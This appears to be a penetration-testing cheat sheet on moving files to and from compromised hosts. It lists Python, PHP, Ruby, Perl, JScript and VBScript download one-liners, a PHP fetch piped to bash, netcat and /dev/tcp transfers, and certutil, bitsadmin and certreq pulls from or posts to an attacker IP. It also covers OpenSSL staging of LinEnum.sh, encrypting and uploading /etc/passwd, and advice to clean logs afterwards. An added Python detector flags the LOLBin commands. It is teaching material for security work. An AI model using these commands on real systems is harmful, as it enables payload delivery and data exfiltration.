Advanced File Transfer Techniques

Programming Language Methods

Python

# Python 2 Download
python2.7 -c 'import urllib; urllib.urlretrieve("URL", "output_file")'

# Python 3 Download
python3 -c 'import urllib.request; urllib.request.urlretrieve("URL", "output_file")'

# Python 3 Upload (requires requests)
python3 -c 'import requests; requests.post("http://<IP>:<PORT>/upload", files={"files": open("/path/to/file", "rb")})'

PHP

# Download with file_get_contents
php -r '$file = file_get_contents("URL"); file_put_contents("output_file", $file);'

# Download with fopen
php -r 'const BUFFER = 1024; $fremote = fopen("URL", "rb"); $flocal = fopen("output_file", "wb"); while (($buffer = fread($fremote, BUFFER)) !== false && $buffer !== "") { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

# Download and Execute
php -r '$lines = @file("URL"); foreach ($lines as $line_num => $line) { echo $line; }' | bash

Ruby and Perl

# Ruby Download
ruby -e 'require "net/http"; File.write("output_file", Net::HTTP.get(URI.parse("URL")))'

# Perl Download
perl -e 'use LWP::Simple; getstore("URL", "output_file");'

Windows Scripting Methods

JavaScript (wget.js)

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), false);
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

Execute with: cscript.exe /nologo wget.js URL output_file

VBScript (wget.vbs)

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

Execute with: cscript.exe /nologo wget.vbs URL output_file

Netcat and Network Transfer Methods

Basic Netcat Transfer

# Receiver (Listening Mode)
nc -l -p 8000 > file_name.exe

# Sender
nc -q 0 target_IP 8000 < file_name.exe

Ncat with Enhanced Features

# Receiver
ncat -l -p 8000 --recv-only > file_name.exe

# Sender
ncat --send-only target_IP 8000 < file_name.exe

Alternative Methods

# Listen on Attack Host
sudo nc -l -p 443 -q 0 < file_name.exe

# Connect from Compromised Machine
nc attack_IP 443 > file_name.exe

# Using /dev/tcp (bash built-in redirection, no netcat required)
cat < /dev/tcp/attack_IP/443 > file_name.exe

PowerShell Session File Transfer

WinRM Setup and Transfer

# Test Connection
Test-NetConnection -ComputerName target_name -Port 5985

# Create Session
$Session = New-PSSession -ComputerName target_name

# Transfer Files
Copy-Item -Path C:\localfile.txt -ToSession $Session -Destination C:\remote_path\
Copy-Item -Path "C:\remote_path\remote_file.txt" -Destination C:\local_path\ -FromSession $Session

Protected File Transfers

Windows Encryption

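# Invoke-AESEncryption is not a built-in cmdlet; load the script that defines it before running these commands.

# Encrypt String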
Invoke-AESEncryption -Mode Encrypt -Key "p@ssw0rd" -Text "Sensitive Data"

# Decrypt String
Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Text "<Encrypted_String>"

# Encrypt File
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\file.bin

# Decrypt File
Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\file.bin.aes

Linux Encryption

# Encrypt File
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc

# Decrypt File
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd

HTTP/S File Upload Server

Nginx Upload Server Setup

# Create Upload Directory
sudo mkdir -p /var/www/uploads/SecretUploadDirectory
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory

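# Nginx Configuration (/etc/nginx/sites-available/upload.conf)
# Note: as written, this accepts unauthenticated PUT requests from any client that can reach port 9001; restrict access at the firewall or in nginx.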
server {
    listen 9001;
    location /SecretUploadDirectory/ {
        root /var/www/uploads;
        dav_methods PUT;
    }
}

# Enable Configuration
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
sudo systemctl restart nginx.service

# Test Upload
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt

Living off The Land (LOLBins/GTFOBins)

Windows LOLBins Examples

# CertReq Upload
certreq.exe -Post -config http://<attack_IP>:8000/ C:\Windows\win.ini

# Bitsadmin Download
bitsadmin /transfer myJobName /priority foreground http://<attack_IP>:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe

# Certutil Download
certutil.exe -verifyctl -split -f http://<attack_IP>:8000/nc.exe

# PowerShell BITS
Import-Module bitstransfer; Start-BitsTransfer -Source "http://<attack_IP>:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
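
Detection-side view of the commands above, as an added example that is not part of the original page: a Python matcher for the CertReq, Bitsadmin, Certutil and Start-BitsTransfer one-liners, plus the cscript wget.js/wget.vbs launcher from the Windows Scripting Methods section, run over process-creation command lines. The rule names, the sample events and the 192.0.2.10 address are constructed for illustration.

```python
import re

URL = r"https?://\S+"
# Illustrative rules (an assumption of this example) keyed to the commands above.
RULES = {
    "certreq_post_upload": rf"\bcertreq(?:\.exe)?\b.*\s-post\b.*{URL}",
    "bitsadmin_transfer": rf"\bbitsadmin(?:\.exe)?\b.*\s/transfer\b.*{URL}",
    # -urlcache is a related certutil download verb that the page does not list.
    "certutil_download": rf"\bcertutil(?:\.exe)?\b.*\s-(?:verifyctl|urlcache)\b.*{URL}",
    "ps_bits_transfer": rf"\bStart-BitsTransfer\b.*-Source\s+\W?{URL}",
    "cscript_url_argument": rf"\b[cw]script(?:\.exe)?\b.*\.(?:js|vbs)\b.*{URL}",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def classify(cmdline):
    """Return (matching rule names, URLs seen) for one process command line."""
    hits = sorted(name for name, rx in COMPILED.items() if rx.search(cmdline))
    return hits, (URL_RE.findall(cmdline) if hits else [])


def scan(events):
    """events: iterable of (host, cmdline). Returns one finding per flagged event."""
    findings = []
    for host, cmdline in events:
        hits, urls = classify(cmdline)
        if hits:
            findings.append({"host": host, "rules": hits, "urls": urls})
    return findings


# Constructed process-creation command lines (192.0.2.10 is a documentation address).
SAMPLE_EVENTS = [
    ("WS01", r"certreq.exe -Post -config http://192.0.2.10:8000/ C:\Windows\win.ini"),
    ("WS01", r"bitsadmin /transfer myJobName /priority foreground http://192.0.2.10:8000/nc.exe C:\Temp\nc.exe"),
    ("WS02", r"C:\Windows\System32\certutil.exe -verifyctl -split -f http://192.0.2.10:8000/nc.exe"),
    ("WS02", r'powershell.exe -c "Start-BitsTransfer -Source http://192.0.2.10:8000/nc.exe -Destination C:\Windows\Temp\nc.exe"'),
    ("WS03", r"cscript.exe /nologo wget.js http://192.0.2.10:8000/nc.exe nc.exe"),
    # Benign uses of the same binaries: no transfer verb, or no URL.
    ("WS03", r"certutil.exe -hashfile C:\Temp\setup.msi SHA256"),
    ("WS04", r"bitsadmin /list /allusers"),
    ("WS04", r"cscript.exe /nologo C:\Scripts\inventory.vbs"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["host"], ",".join(finding["rules"]), finding["urls"])
```

Matching on the binary name together with its transfer verb and a URL keeps routine uses of the same tools, such as certutil -hashfile, out of the findings.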

Linux GTFOBins Examples

# OpenSSL Transfer
# On Attack Host
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

# On Target
openssl s_client -connect <attack_IP>:80 -quiet > LinEnum.sh

Best Practices

  1. Security Considerations

    • Always encrypt sensitive data before transfer

    • Use secure protocols when available (HTTPS, SFTP, SSH)

    • Clean up files and logs after transfer

  2. Protocol Selection

    • Consider firewall restrictions

    • Use commonly allowed protocols (HTTP/HTTPS)

    • Have multiple methods ready as backup

  3. Authentication and Access

    • Use strong, unique passwords for encrypted transfers

    • Remove temporary access after transfer completion

    • Monitor for security alerts during transfer

  4. Testing and Verification

    • Verify file integrity after transfer

    • Test transfer methods in lab environment first

    • Document successful methods for future reference